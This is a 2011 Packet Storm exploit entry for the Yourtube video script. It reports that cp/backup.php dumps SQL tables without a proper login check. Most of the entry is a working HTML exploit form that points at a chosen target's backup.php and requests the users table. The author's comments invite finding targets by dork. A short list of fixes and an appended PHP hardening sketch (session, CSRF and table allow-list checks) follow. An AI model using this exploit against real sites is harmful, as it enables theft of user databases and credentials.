Yourtube Database Download

2011-03-14T00:00:00
ID PACKETSTORM:99274
Type packetstorm
Reporter Eg-R1z
Modified 2011-03-14T00:00:00

Description

                                        
                                            ` - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
| Exploit Title : Yourtube Sql table download vuln  
| Author : Eg-R1z  
| Home : black-hat.cc , sec4ever.com  
| contact : Get me @ the above sites > i-Hmx  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
| script name : Yourtube  
| version : 1.0 , 2.0 don't know abt v3 but it's maybe affected also  
| Dork : just find ur own one  
| Vulnerability : due to stupid confirmation rule on cp/backup.php file  
| Quick solution:-  
| Coder rule : Applying strong login confirmation rule on backup.php file  
| User rule : firewall on the cp directory seem 2 B enough  
| > Update to newer version < v4 is preferred >  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
  
- - - - - - - - - - - - - - - - - - Exploit Code <html> - - - - - - - - - - - - - - - - - - - -  
<html dir="rtl">  
<head>  
<style type="text/css">  
<!--  
.style1 {color: #FF0000}  
.style2 {  
color: #0000FF;  
font-weight: bold;  
}  
-->  
</style>  
<title>YourTube Sql tables Download Exploit - HaCKeR-MaN</title><div>  
</TD></TR>  
</TABLE>  
</td>  
<td width="100%" height="327" align="center" valign="top">  
<TABLE align="center" dir="ltr" WIDTH=97% BORDER=0 CELLPADDING=0 CELLSPACING=0 height="23">  
<TR>  
<TD dir="rtl" bgcolor="#FFFFFF" align="center" valign="top" height="19" width="959">  
<div align="center">  
<form name="a" action=""  
method="post" name="formw" onsubmit="document.a.action = document.a.site.value+'/backup.php';document.a.submit">  
</div>  
<p align="center"><strong>YourTube Sql tables Download Exploit</strong></p>  
<p align="center"><strong>Coded By <span class="style1">HaCKeR-MaN</span></strong></p>  
<p align="center"><strong>Black-hat.cc , sec4ever.com </strong></p>  
<p align="center" class="style2">Target Url </p>  
<p align="center">  
<input name="action" type="hidden" value="yes">  
<input name="site" type="text" value="http://target/path/cp" size="35" align="left">  
</p>  
<p align="center" class="style2">Table name </p>  
<p align="center">  
<input type="text" name="tablen[]" value="ac4pcom_users" size=35 />  
</p>  
<p align="center"><br>  
<input type="submit" name="submit2" class="buttons" value="Get it" />  
</form>  
</p></TD></TR>  
</td>  
</tr>  
</center>  
</div>  
</body>  
</html>  
  
- - - - - - - - - - - - - - - - - - End of the shit - - - - - - - - - - - - - - - - - - - -  
`
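
The "Coder rule" above, a strong login check on `cp/backup.php`, sketched as an added example; this is not Yourtube's code and not part of the original advisory. The session keys `admin_id` and `csrf`, the `csrf` form field, and the allow-listed table names are assumptions made for illustration.

```php
<?php
// Hypothetical guard for the top of cp/backup.php (added example).
// Assumptions: the control-panel login sets $_SESSION['admin_id'] and
// $_SESSION['csrf'], and the backup form posts a 'csrf' field next to
// the 'action' and 'tablen[]' fields.
declare(strict_types=1);

session_start([
    'cookie_httponly' => true,
    'cookie_samesite' => 'Strict',
    'use_strict_mode' => true,
]);

function deny(int $status, string $reason): void
{
    http_response_code($status);
    header('Content-Type: text/plain; charset=utf-8');
    // Log server-side so refused backup requests show up in review.
    error_log('backup.php denied: ' . $reason . ' from ' . ($_SERVER['REMOTE_ADDR'] ?? '?'));
    exit('Access denied');
}

// 1. Only an authenticated admin session may reach the dump logic.
if (empty($_SESSION['admin_id'])) {
    deny(403, 'no admin session');
}

// 2. Require POST plus the session's CSRF token, so a form hosted on
//    another origin cannot drive the backup through a logged-in admin.
$expected = (string) ($_SESSION['csrf'] ?? '');
$token    = $_POST['csrf'] ?? '';
if ($_SERVER['REQUEST_METHOD'] !== 'POST' || $expected === ''
    || !is_string($token) || !hash_equals($expected, $token)) {
    deny(403, 'bad method or CSRF token');
}

// 3. Table names arrive from the request: accept only allow-listed ones.
//    Placeholder names; the credentials table is deliberately left out.
$allowed = ['example_videos', 'example_comments'];
$tables  = $_POST['tablen'] ?? [];
if (!is_array($tables) || $tables === []) {
    deny(400, 'no tables requested');
}
foreach ($tables as $t) {
    if (!is_string($t) || !in_array($t, $allowed, true)) {
        deny(400, 'table not on allow-list');
    }
}
// The existing backup logic continues here, using only $tables.
```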